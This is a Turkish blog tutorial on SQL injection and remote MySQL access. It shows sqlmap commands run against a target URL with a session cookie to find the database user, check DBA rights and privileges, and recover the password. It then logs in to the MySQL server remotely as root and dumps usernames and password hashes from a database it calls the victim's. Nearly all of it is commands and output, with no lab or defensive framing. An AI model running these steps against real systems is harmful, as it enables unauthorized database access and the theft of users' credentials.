~$ sqlmap.py -u "http://cw.org/terlik.php?id=3" --cookie="PHPSESSID:falan_filan" --current-user Şimdi teker teker pa...

Sıradışı SQL İnjection | Remote SQL Connection

9/24/2017 0 Yorumlar

sql inj ile ilgili görsel sonucu

~$ sqlmap.py -u "http://cw.org/terlik.php?id=3" --cookie="PHPSESSID:falan_filan" --current-user

Şimdi teker teker parametrelerin ne anlama geldiğini açıklayalım.

--current-user: Current hedef manasına gelmekte, user kullanıcı anlamındadır. hedef user kimmiş öğreniyoruz.

Sorgu sonucu çıktı: root@bomch4nte



Kullanıcımız root@bomch4nte imiş.

Şimdi kullanıcı’nın ne mevkiide olduğuna bakalım

~$ sqlmap.py -u "http://cw.org/terlik.php?id=3" --cookie="PHPSESSID:falan_filan" --current-user --is-dba

--is-dba: Hedef user DataBaseAdministrator? ’ü mü diye sorgu gönderdik database’ye.



current user is DBA: True

True; yani doğrudur, hedef user admin yetisine sahip dedi.

Şimdi admin ama ne tür yetkileri var ona bakacağız, yazma, oluşturma, okuma, silme derken liste uzuyor.



~$ sqlmap.py -u "http://cw.org/terlik.php?id=3" --cookie="PHPSESSID:falan_filan" --current-user --is-dba --privileges

Diyip ayrıcalıklarımızı görelim:



Bu gördüğünüz listenin yalnızca bir kısmı.

Gereken bilgileri aldık devam edelim.

~$ sqlmap.py -u "http://cw.org/terlik.php?id=3" --cookie="PHPSESSID:falan_filan" --current-user --password

--password: Adından da anlaşılacağı üzere şifre’yi elde etmeye çalışıyoruz.

Database adı : bomch4nte

Database admin kullanıcısı : root

Database şifresi : Null (yani şifre belirlenmemiş)

2. Bölüm

Bunlar bizim için yeterli sıra geldi Uzak Mysql Bağlantısı’nı sağlamaya:

Komut satırı ( CMD , Uçbirim )’de};

~$
mysql -h host_ip_adresi -u usernanme -p password

Komutunu giriyoruz, tabi kendimize uyarlayarak, örneğin;

~$ mysql -h 192.168.1.1 -u root -p

Ve mysql komutları çalıştırmamıza olanak sağlayan komut satrına geçiyoruz.

mysql> --> Artık buradan komut çalıştırabileceğiz.

Şimdi ise; hostta 4 tane db var diyelim, biri kurbanın database’si, ordaki user bilgilerini ele geçireceğiz:

mysql> show databases;

bomch4nte
Cyberwarrior
akıncılar
pentesteracademy

Biz pentesteracademy’deki bilgileri dump edeceğiz, devam;


mysql> use pentesteracademy;

mysql> show tables;

users
blog
ziyaretciler

Diye 3 tablodan oluşuyor. users’teki bilgileri çekeceğiz;

mysql> describe users;

id
e_mail
u_name
u_pass

şeklinde 3 kolon var, işimize yarayacak olan u_name ve u_pass

mysql> select u_name,u_pass from users;

u_name |    u_pass

admin        sifrenin_md5_hali


şeklinde bir çıktı verecektir. Eğer tüm bilgileri çekmek istiyorsak o kolondaki; select * from users; sorgusunu girecektik.

Videolu anlatımlar:

1. PART

2. PART

0 yorum: